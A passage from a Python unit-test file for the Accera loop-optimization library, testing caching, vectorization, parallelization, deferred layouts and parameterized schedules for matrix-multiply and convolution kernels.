# create a HAT package and add the function to it
package = Package()
function = package.add(plan, args, base_name="caching_test")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_caching_by_level(self) -> None:
plan, args, indices = self._create_plan((16, 10, 11))
A, B, C = args
_, j, _ = indices
AA = plan.cache(A, level=2)
self.assertEqual(AA.index, j)
# input, different layout
BB = plan.cache(B, level=2, layout=Array.Layout.FIRST_MAJOR)
self.assertEqual(BB.index, j)
self._verify_plan(plan, [A, B, C], "test_caching_by_level")
def test_caching_by_index(self) -> None:
plan, args, indices = self._create_plan((16, 10, 11))
A, B, C = args
_, j, _ = indices
with self.assertRaises(ValueError):
AA = plan.cache(A, index=j, level=1)
AA = plan.cache(A, index=j) # input
self.assertEqual(AA.index, j)
# input, different layout
BB = plan.cache(B, index=j, layout=Array.Layout.FIRST_MAJOR)
self.assertEqual(BB.index, j)
CC = plan.cache(C, index=j) # input/output
self.assertEqual(CC.index, j)
self._verify_plan(plan, [A, B, C], "test_caching_by_index")
def test_caching_by_element_budget(self) -> None:
plan, args, _ = self._create_plan((256, 10, 11))
A, B, C = args
AA = plan.cache(A, max_elements=1024)
self.assertEqual(AA.index, None)
self.assertEqual(AA.max_elements, 1024)
self._verify_plan(plan, [A, B, C], "test_caching_by_element_budget")
def test_thrifty_caching(self) -> None:
plan, args, indices = self._create_plan((16, 10, 11))
A, B, C = args
_, j, k = indices
# A is row-major, thrifty mode should skip caching
AA = plan.cache(A, thrifty=True, index=j)
self.assertIsNotNone(AA)
# B is column-major, thrifty mode should cache
BB = plan.cache(B, thrifty=True, index=k)
self.assertIsNotNone(BB)
self._verify_plan(plan, [A, B, C], "test_thrifty_caching")
@expectedFailure(FailedReason.NOT_IN_PY, "Various target memory identifiers")
def test_cache_mapping(self) -> None:
A = Array(role=Array.Role.INPUT, shape=(1024, ))
nest = Nest(shape=(64, ))
i = nest.get_indices()
@nest.iteration_logic
def _():
A[i] += 2
v100 = Target(Target.Model.NVIDIA_V100, category=Target.Category.GPU, num_threads=16)
plan = nest.create_plan(v100)
plan.cache(i, type=v100.MemorySpace.SHARED)
self._verify_plan(plan, [A], "test_cache_mapping")
def test_cache_trigger_level(self) -> None:
A = Array(role=Array.Role.INPUT, shape=(1024, 1024))
B = Array(role=Array.Role.INPUT_OUTPUT, shape=(1024, 1024))
nest = Nest(shape=(1024, 1024))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
B[i, j] += A[i, j]
schedule = nest.create_schedule()
ii = schedule.split(i, 128)
jj = schedule.split(j, 256)
schedule.reorder(i, j, ii, jj)
plan = schedule.create_plan()
plan.cache(A, index=ii, trigger_index=j)
self._verify_plan(plan, [A, B], "test_cache_trigger_level")
def test_cache_trigger_level_matmul(self) -> None:
M = 1024
N = 1024
S = 1024
A = Array(role=Array.Role.INPUT, shape=(M, S))
B = Array(role=Array.Role.INPUT, shape=(S, N))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, N))
nest = Nest(shape=(M, N, S))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
jj = schedule.split(j, 128)
kk = schedule.split(k, 256)
kkk = schedule.split(kk, 4)
jjj = schedule.split(jj, 16)
jjjj = schedule.split(jjj, 8)
ii = schedule.split(i, 6)
schedule.reorder(j, k, i, jj, kk, kkk, ii, jjj, jjjj)
plan = schedule.create_plan()
plan.cache(B, index=kkk, trigger_index=k, layout=Array.Layout.FIRST_MAJOR)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
self._verify_plan(
plan, [A, B, C], "test_cache_trigger_level_matmul", correctness_check_values=correctness_check_values
)
def test_hierachical_caching(self) -> None:
M = 1024
N = 1024
S = 1024
A = Array(role=Array.Role.INPUT, shape=(M, S))
B = Array(role=Array.Role.INPUT, shape=(S, N))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, N))
nest = Nest(shape=(M, N, S))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
jj = schedule.split(j, 128)
kk = schedule.split(k, 256)
kkk = schedule.split(kk, 4)
jjj = schedule.split(jj, 16)
jjjj = schedule.split(jjj, 8)
ii = schedule.split(i, 6)
schedule.reorder(j, k, i, jj, kk, kkk, ii, jjj, jjjj)
plan = schedule.create_plan()
AA = plan.cache(A, level=5, trigger_level=7, layout=Array.Layout.FIRST_MAJOR)
AAA = plan.cache(AA, level=3, trigger_level=5, layout=Array.Layout.LAST_MAJOR)
BB = plan.cache(B, level=6, trigger_level=7, layout=Array.Layout.FIRST_MAJOR)
BBB = plan.cache(BB, level=2, trigger_level=5, layout=Array.Layout.LAST_MAJOR)
CC = plan.cache(C, level=8, layout=Array.Layout.FIRST_MAJOR)
CCC = plan.cache(CC, level=6, layout=Array.Layout.LAST_MAJOR)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
self._verify_plan(
plan, [A, B, C], "test_hierarchical_caching", correctness_check_values=correctness_check_values
)
class DSLTest_07PlansVectorizationParallelization(unittest.TestCase):
def _verify_plan(self, plan, args: Tuple[int], package_name, correctness_check_values=None) -> None:
package = Package()
function = package.add(plan, args, base_name="vectorization_parallelization_test")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_unroll(self) -> None:
from accera import Target, Nest
A = Array(role=Array.Role.INPUT, shape=(3, 5))
my_target = Target(category=Target.Category.CPU)
nest = Nest(shape=(3, 5))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
A[i, j] *= 2.0
plan1 = nest.create_plan(my_target)
plan1.unroll(index=j)
self._verify_plan(plan1, [A], "test_unroll1")
plan2 = nest.create_plan(my_target)
plan2.unroll(index=i)
self._verify_plan(plan2, [A], "test_unroll2")
def test_vectorize(self) -> None:
from accera import Target, Nest
A = Array(role=Array.Role.INPUT, shape=(64, ))
B = Array(role=Array.Role.INPUT, shape=(64, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(64, ))
my_target = Target(category=Target.Category.CPU, vector_bytes=16, vector_registers=2)
nest = Nest(shape=(64, ))
i = nest.get_indices()
@nest.iteration_logic
def _():
C[i] = A[i] * B[i]
plan = nest.create_plan(my_target)
plan.vectorize(index=i)
self._verify_plan(plan, [A, B, C], "test_vectorize")
def test_kernelize(self) -> None:
from accera import Target, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 11))
B = Array(role=Array.Role.INPUT, shape=(11, 10))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 10))
nest = Nest(shape=(16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
my_target = Target(category=Target.Category.CPU, vector_bytes=16, vector_registers=2)
plan = nest.create_plan(my_target)
# Shorthand for:
# plan.unroll(i)
# plan.unroll(j)
# plan.vectorize(k)
plan.kernelize(unroll_indices=(i, j), vectorize_indices=k)
self._verify_plan(plan, [A, B, C], "test_kernelize")
def test_kernelize_2(self) -> None:
from accera import Target, Nest
A = Array(role=Array.Role.INPUT, shape=(16, 16))
B = Array(role=Array.Role.INPUT, shape=(16, 16))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 16))
nest = Nest(shape=(16, 16, 16))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
my_target = Target(category=Target.Category.CPU, vector_bytes=16, vector_registers=2)
plan = nest.create_plan(my_target)
# Shorthand for:
# plan.unroll(i)
# plan.vectorize(j)
# plan.vectorize(k)
plan.kernelize(unroll_indices=(i, ), vectorize_indices=(j, k))
self._verify_plan(plan, [A, B, C], "test_kernelize_2")
@expectedFailure(FailedReason.NOT_IN_PY, "pinning parallelization to CPU cores")
def test_cpu_bind(self) -> None:
A = Array(role=Array.Role.INPUT, shape=(16, 11))
B = Array(role=Array.Role.INPUT, shape=(11, 10))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(16, 10))
nest = Nest(shape=(16, 10, 11))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
target = Target("HOST", num_threads=16)
plan = nest.create_plan(target)
plan.parallelize(indices=(i, j, k), pin=(target.cores[0], target.cores[1])) # TODO: confirm syntax
self._verify_plan(plan, [A, B, C], "test_cpu_bind")
def test_gpu_bind(self) -> None:
M = 128
N = 256
K = 256
A = Array(role=Array.Role.INPUT, shape=(M, K))
B = Array(role=Array.Role.INPUT, shape=(K, N))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, N))
nest = Nest(shape=(M, N, K))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
v100 = Target(Target.Model.NVIDIA_V100, category=Target.Category.GPU)
plan = nest.create_plan(v100)
plan.bind(mapping={
i: v100.GridUnit.BLOCK_X,
j: v100.GridUnit.THREAD_X,
k: v100.GridUnit.THREAD_Y
})
test_name = "test_gpu_bind"
package = Package()
function = package.add(plan, args=(A, B, C), base_name=test_name)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / test_name
with verifiers.VerifyPackage(self, test_name, output_dir, file_list=[f"{test_name}.cu",
f"{test_name}.hat"]) as v:
package.build(
name=test_name,
format=Package.Format.MLIR | Package.Format.CUDA | Package.Format.HAT_PACKAGE,
mode=Package.Mode.RELEASE, # Package.Mode.DEBUG,
output_dir=output_dir
)
def test_scheduling_strategies(self) -> None:
A = Array(role=Array.Role.INPUT, shape=(256, 1024))
B = Array(role=Array.Role.INPUT, shape=(1024, 512))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(256, 512))
nest = Nest(shape=(256, 512, 1024))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
target = Target("HOST", num_threads=16)
# disable correctness checking on windows because the
# install location of libomp.dll is non-standard as of now
if sys.platform.startswith('win'):
correctness_check_values = None
else:
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
schedule = nest.create_schedule()
ii = schedule.split(i, A.shape[0] // min(4, target.num_threads))
# set the index (k) that cannot be parallelized as innermost
schedule.reorder(i, ii, j, k)
for policy in ["static", "dynamic"]:
plan = schedule.create_plan(target)
# wrong order
with self.assertRaises(ValueError):
plan.parallelize(indices=(k, ii), policy=policy)
# non-contiguous
with self.assertRaises(ValueError):
plan.parallelize(indices=(i, j), policy=policy)
# non-collapsed
plan.parallelize(indices=i, policy=policy)
self._verify_plan(plan, [A, B, C], f"test_parallelize_i_{policy}", correctness_check_values)
# parallelizing middle index
plan_ii = schedule.create_plan(target)
plan_ii.parallelize(indices=ii, policy=policy)
self._verify_plan(plan_ii, [A, B, C], f"test_parallelize_ii_{policy}", correctness_check_values)
# partial collapsed
plan_partial = schedule.create_plan(target)
plan_partial.parallelize(indices=(i, ii, j), policy=policy)
self._verify_plan(plan_partial, [A, B, C], f"test_parallelize_i_ii_j_{policy}", correctness_check_values)
# partial collapsed inner indices
plan_partial_inner = schedule.create_plan(target)
plan_partial_inner.parallelize(indices=(ii, j), policy=policy)
self._verify_plan(
plan_partial_inner, [A, B, C], f"test_parallelize_ii_j_{policy}", correctness_check_values
)
# fully collapsed will result in correctness issues because parallelizing k can stomp on the C matrix
# where multiple threads try to update C[i, j] for different values of k
class DSLTest_08DeferredLayout(unittest.TestCase):
def _verify_package(self, plan, args, package_name, correctness_check_values) -> None:
package = Package()
function = package.add(plan, args, base_name="deferred_layout")
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_deferred_layout_predefined(self) -> None:
matrix = np.random.rand(128, 128).astype(np.float32)
B_test = np.random.random(matrix.shape).astype(np.float32)
for layout in [Array.Layout.FIRST_MAJOR, Array.Layout.LAST_MAJOR]:
A = Array(role=Array.Role.CONST, data=matrix, layout=Array.Layout.DEFERRED)
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=matrix.shape)
nest = Nest(shape=matrix.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
B[i, j] += A[i, j]
# create a cache for the constant array
plan1 = nest.create_plan()
AA = plan1.cache(A, i, layout=layout) # , thrifty=True) # TODO
# create another cache, using a different plan, for testing purposes
plan2 = nest.create_plan()
BB = plan2.cache(B, i)
with self.assertRaises(ValueError):
B.deferred_layout(cache=BB) # non-const array
with self.assertRaises(ValueError):
A.deferred_layout(cache=BB) # wrong cache
# update the constant array's layout based on the cache
A.deferred_layout(cache=AA)
self.assertEqual(A.layout, AA.layout)
with self.assertRaises(ValueError):
A.deferred_layout(cache=AA) # duplicate
package_name = f"test_deferred_layout_predefined_{layout}".replace(".", "_") # sanitize path name
self._verify_package(plan1, (B, ), package_name, {
"pre": [B_test],
"post": [B_test + matrix]
})
def test_deferred_layout_coefficients(self) -> None:
matrix = np.random.rand(128, 128).astype(np.float32)
B_test = np.random.random(matrix.shape).astype(np.float32)
for layout in [(128, 1), (1, 128)]:
A = Array(role=Array.Role.CONST, data=matrix, layout=Array.Layout.DEFERRED)
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=matrix.shape)
nest = Nest(shape=matrix.shape)
i, j = nest.get_indices()
@nest.iteration_logic
def _():
B[i, j] += A[i, j]
plan = nest.create_plan()
AA = plan.cache(A, i, layout=layout) # , thrifty=True) # TODO
A.deferred_layout(cache=AA)
self.assertEqual(A.layout, AA.layout)
package_name = f"test_deferred_layout_coefficients_{'_'.join(map(str, layout))}"
self._verify_package(plan, (B, ), package_name, {
"pre": [B_test],
"post": [B_test + matrix]
})
class DSLTest_09Parameters(unittest.TestCase):
def test_parameterization_1(self) -> None:
from accera import create_parameters, Nest
P0, P1, P2, P3 = create_parameters(4)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P0, P2))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P2, P1))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(P0, P1))
nest = Nest(shape=(P0, P1, P2))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += P3 * A[i, k] * B[k, j]
package = Package()
package_name = "test_parameterization_1"
# Use the templated nest to add two different functions to the package
package.add(
nest, args=(A, B, C), parameters={
P0: 16,
P1: 16,
P2: 16,
P3: 1.0
}, base_name="matmul_16_16_16_1"
)
package.add(
nest, args=(A, B, C), parameters={
P0: 32,
P1: 32,
P2: 32,
P3: 2.0
}, base_name="matmul_32_32_32_2"
)
P4, P5 = create_parameters(2)
# Create a parameterized schedule
schedule = nest.create_schedule()
ii = schedule.split(i, size=P4)
P6 = create_parameters(1)
schedule.reorder(order=P6)
# Create a parameterized plan
plan = schedule.create_plan()
plan.cache(A, level=P5)
# Add another function to the package
package.add(
plan,
args=(A, B, C),
parameters={
P0: 16,
P1: 16,
P2: 16,
P3: 1.0,
P4: 4,
P5: 2,
P6: (j, k, i, ii)
},
base_name="alternative_matmul_16_16_16"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_parameterization_2(self) -> None:
from accera import create_parameters, Nest
P0, P1, P2, P3 = create_parameters(4)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P0, P2))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P2, P1))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(P0, P1))
nest = Nest(shape=(P0, P1, P2))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += P3 * A[i, k] * B[k, j]
package = Package()
package_name = "test_parameterization_2"
P4, P5 = create_parameters(2)
# Create a parameterized schedule
schedule = nest.create_schedule()
ii = schedule.split(i, size=P4)
jj = schedule.split(j, size=P4)
kk = schedule.split(k, size=P4)
P6, P7, P8 = create_parameters(3)
schedule.reorder(order=P6)
# Create a parameterized plan
plan = schedule.create_plan()
plan.cache(A, level=P5)
plan.kernelize(unroll_indices=P7, vectorize_indices=P8)
# Add another function to the package
package.add(
plan,
args=(A, B, C),
parameters={
P0: 256,
P1: 256,
P2: 256,
P3: 1.0,
P4: 4,
P5: 2,
P6: (j, k, i, ii, jj, kk),
P7: (ii, jj),
P8: kk
},
base_name="matmul_256_256_256"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_parameterization_3(self) -> None:
from accera import create_parameters, Nest
for N in [10, 224]: # input sizes
for K in [1, 3, 5]: # filter sizes
M = N - K + 1 # output size
P = create_parameters(1)
A = Array(role=Array.Role.INPUT, shape=(N, ))
B = Array(role=Array.Role.INPUT, shape=(K, ))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(M, ))
nest = Nest(shape=(M, K))
i, j = nest.get_indices()
@nest.iteration_logic
def _():
C[i] += A[i + j] * B[j]
schedule = nest.create_schedule()
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + np.convolve(np.flip(B_test), A_test, "valid")]
}
# Skew dimension i with respect to dimension j with unroll loop not smaller than P.
schedule.skew(i, j, P)
# create a HAT package and add the function to it
package = Package()
package_name = f"test_parameterization_3_skew_i_j_{N}_{K}"
function = package.add(
schedule, args=(A, B, C), parameters={P: 0}, base_name=f"schedule_test_skew_i_j_{N}_{K}"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name,
before=correctness_check_values["pre"],
after=correctness_check_values["post"]
)
def test_parameterization_4(self) -> None:
from accera import create_parameters, Nest
M = 16
N = 10
S = 11
type = ScalarType.float32
A = Array(role=Array.Role.INPUT, element_type=type, shape=(M, S))
B = Array(role=Array.Role.INPUT, element_type=type, shape=(S, N))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=type, shape=(M, N))
nest = Nest(shape=(M, N, S))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
schedule = nest.create_schedule()
P1, P2, P3, P4, P5, P6 = create_parameters(6)
# Adds empty elements to the beginning of dimension i, j, k
schedule.pad(i, P1)
ii = schedule.split(i, P2) # (2 + 16) // 3
# should result in these loops for i, ii
# i: [2, 3:3), ii: [0, 1:1) <-- partial (front padding)
# i: [3: 18:3), ii: [0, 3:1) <-- full
schedule.pad(j, P3)
jj = schedule.split(j, P4) # (3 + 10) // 3
# should result in these loops for j, jj
# j: [3, 12:3), jj: [0, 3:3) <-- full (front padding == split size)
# j: [12, 13:3), jj: [0, 1:1) <-- partial (automatic back padding)
schedule.pad(k, P5)
kk = schedule.split(k, P6) # (11 + 11) // 4
# should result in these loops for k, kk
# k: [11, 12:1), kk: [0, 1: 1) <-- partial
# k: [12, 20:4), kk: [0: 4: 1) <-- full
# k: [20, 22:4), kk: [0: 2: 1) <-- partial (automatic back padding)
schedule.reorder(i, ii, k, j, jj, kk)
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
# create a HAT package and add the function to it
package = Package()
package_name = "test_parameterization_4_pad"
function = package.add(
schedule,
args=(A, B, C),
parameters={
P1: 2,
P2: 3,
P3: 3,
P4: 3,
P5: 11,
P6: 4
},
base_name="schedule_test_pad_parameter"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
# build the HAT package
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
def test_parameterization_5(self) -> None:
from accera import create_parameters
A = Array(role=Array.Role.INPUT, shape=(256, 1024))
B = Array(role=Array.Role.INPUT, shape=(1024, 512))
C = Array(role=Array.Role.INPUT_OUTPUT, shape=(256, 512))
nest = Nest(shape=(256, 512, 1024))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += A[i, k] * B[k, j]
target = Target("HOST", num_threads=16)
assert target.architecture == Target.Architecture.HOST
# disable correctness checking on windows because the
# install location of libomp.dll is non-standard as of now
if sys.platform.startswith('win'):
correctness_check_values = None
else:
A_test = np.random.random(A.shape).astype(np.float32)
B_test = np.random.random(B.shape).astype(np.float32)
C_test = np.random.random(C.shape).astype(np.float32)
correctness_check_values = {
"pre": [A_test, B_test, C_test],
"post": [A_test, B_test, C_test + A_test @ B_test]
}
schedule = nest.create_schedule()
ii = schedule.split(i, A.shape[0] // target.num_threads)
# set the index (k) that cannot be parallelized as innermost
schedule.reorder(i, ii, j, k)
P1, P2, P3, P4, P5, P6, P7, P8 = create_parameters(8)
for policy in ["static", "dynamic"]:
plan = schedule.create_plan(target)
# non-collapsed
plan.parallelize(indices=P1, policy=P2)
package_name = f"parameterized_test_parallelize_i_{policy}"
package = Package()
function = package.add(
plan,
args=[A, B, C],
parameters={
P1: i,
P2: policy
},
base_name=f"parameterized_vectorization_parallelization_test_i_{policy}"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
# parallelizing middle index
plan_ii = schedule.create_plan(target)
plan_ii.parallelize(indices=P3, policy=P4)
package_name = f"parameterized_test_parallelize_ii_{policy}"
package_ii = Package()
function_ii = package_ii.add(
plan_ii,
args=[A, B, C],
parameters={
P3: ii,
P4: policy
},
base_name=f"parameterized_vectorization_parallelization_test_ii_{policy}"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package_ii.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function_ii.name, before=correctness_check_values["pre"], after=correctness_check_values["post"]
)
# partial collapsed
plan_partial = schedule.create_plan(target)
plan_partial.parallelize(indices=P5, policy=P6)
package_name = f"parameterized_test_parallelize_i_ii_j_{policy}"
package_partial = Package()
function_partial = package_partial.add(
plan_ii,
args=[A, B, C],
parameters={
P5: (i, ii, j),
P6: policy
},
base_name=f"parameterized_vectorization_parallelization_test_i_ii_j_{policy}"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package_partial.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function_partial.name,
before=correctness_check_values["pre"],
after=correctness_check_values["post"]
)
# partial collapsed inner indices
plan_partial_inner = schedule.create_plan(target)
plan_partial_inner.parallelize(indices=P7, policy=P8)
package_name = f"parameterized_test_parallelize_ii_j_{policy}"
package_partial_inner = Package()
function_partial_inner = package_partial_inner.add(
plan,
args=[A, B, C],
parameters={
P7: (ii, j),
P8: policy
},
base_name=f"parameterized_vectorization_parallelization_test_ii_j_{policy}"
)
output_dir = pathlib.Path(TEST_PACKAGE_DIR) / package_name
with verifiers.VerifyPackage(self, package_name, output_dir) as v:
package_partial_inner.build(package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=output_dir)
if correctness_check_values:
v.check_correctness(
function_partial_inner.name,
before=correctness_check_values["pre"],
after=correctness_check_values["post"]
)
def test_parameterization_grid(self) -> None:
from accera import create_parameters, create_parameter_grid, Nest, Schedule
P0, P1, P2, P3, P4 = create_parameters(5)
A = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P0, P2))
B = Array(role=Array.Role.INPUT, element_type=ScalarType.float32, shape=(P2, P1))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=ScalarType.float32, shape=(P0, P1))
nest = Nest(shape=(P0, P1, P2))
i, j, k = nest.get_indices()
@nest.iteration_logic
def _():
C[i, j] += P3 * A[i, k] * B[k, j]
sched: Schedule = nest.create_schedule()
sched.split(j, P4)
package = Package()
package_name = "test_parameter_grid_generation"
parameter_grid = {
P0: [8, 16],
P1: [16, 32],
P2: [16],
P3: [1.0, 2.0],
P4: [3, 5, 7]
}
parameters = create_parameter_grid(parameter_grid)
package.add(sched, args=(A, B, C), base_name="matmul", parameters=parameters)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_fusion_parameterization_1(self) -> None:
from accera import create_parameters, Nest, fuse
A = Array(role=Array.Role.INPUT, element_type=float, shape=(32, ))
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(32, ))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(1, ))
n0 = Nest([32, 32])
i0, j0 = n0.get_indices()
@n0.iteration_logic
def _():
B[i0] += A[i0] * A[j0]
s0 = n0.create_schedule()
n0_up = Nest(n0.get_shape())
i0_up, j0_up = n0_up.get_indices()
@n0_up.iteration_logic
def _():
B[i0_up] += A[i0_up] * A[j0_up]
s0_up = n0_up.create_schedule()
n1 = Nest([32])
i1 = n1.get_indices()
@n1.iteration_logic
def _():
C[0] += B[i1]
s1 = n1.create_schedule()
P0 = create_parameters(1)
jj0 = s0.split(j0, P0)
jj0_up = s0_up.split(j0_up, 16)
fs = fuse((s0, s1), partial=1)
f, i, j, jj = fs.get_indices()
fs.reorder(i, f, j, jj)
fs_up = fuse((s0_up, s1), partial=1)
f_up, i_up, j_up, jj_up = fs_up.get_indices()
fs_up.reorder(i_up, f_up, j_up, jj_up)
package = Package()
package_name = "test_fusion_parameterization_1"
package.add(fs_up, args=(A, B, C), base_name="fuse_unparameterized_1")
package.add(
fs, args=(A, B, C), parameters={
P0: 16,
}, base_name="fuse_1"
)
package.add(
fs, args=(A, B, C), parameters={
P0: 3,
}, base_name="fuse_2"
)
package.add(
fs, args=(A, B, C), parameters=[{
P0: 5
}, {
P0: 7
}], base_name="fuse_3"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_fusion_parameterization_2(self) -> None:
"""
Goes through a different codepath from the above tests because the
schedules are emitted directly prior to the fused schedule, which
matters because the fused schedule has references to the schedule
"""
from accera import create_parameters, Nest, fuse
A = Array(role=Array.Role.INPUT, element_type=float, shape=(32, ))
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(32, ))
C = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(1, ))
n0 = Nest([32, 32])
i0, j0 = n0.get_indices()
@n0.iteration_logic
def _():
B[i0] += A[i0] * A[j0]
s0 = n0.create_schedule()
n1 = Nest([32])
i1 = n1.get_indices()
@n1.iteration_logic
def _():
C[0] += B[i1]
s1 = n1.create_schedule()
P0 = create_parameters(1)
jj0 = s0.split(j0, P0)
fs = fuse((s0, s1), partial=1)
package = Package()
package_name = "test_fusion_parameterization_2"
package.add(
s0, args=(A, B), parameters={P0: 16}, base_name="s0_1"
)
package.add(
s0, args=(A, B), parameters={P0: 32}, base_name="s0_2"
)
package.add(
s1, args=(C, B), parameters={P0: 16}, base_name="s1_1"
)
package.add(
fs, args=(A, B, C), parameters={
P0: 16,
}, base_name="fuse_1"
)
package.add(
fs, args=(A, B, C), parameters={
P0: 32,
}, base_name="fuse_2"
)
with verifiers.VerifyPackage(self, package_name, TEST_PACKAGE_DIR):
package.build(name=package_name, format=TEST_FORMAT, mode=TEST_MODE, output_dir=TEST_PACKAGE_DIR)
def test_fusion_parameterization_3(self) -> None:
from accera import create_parameters, Nest, fuse
A = Array(role=Array.Role.INPUT, element_type=float, shape=(32, ))
B = Array(role=Array.Role.INPUT_OUTPUT, element_type=float, shape=(32, ))
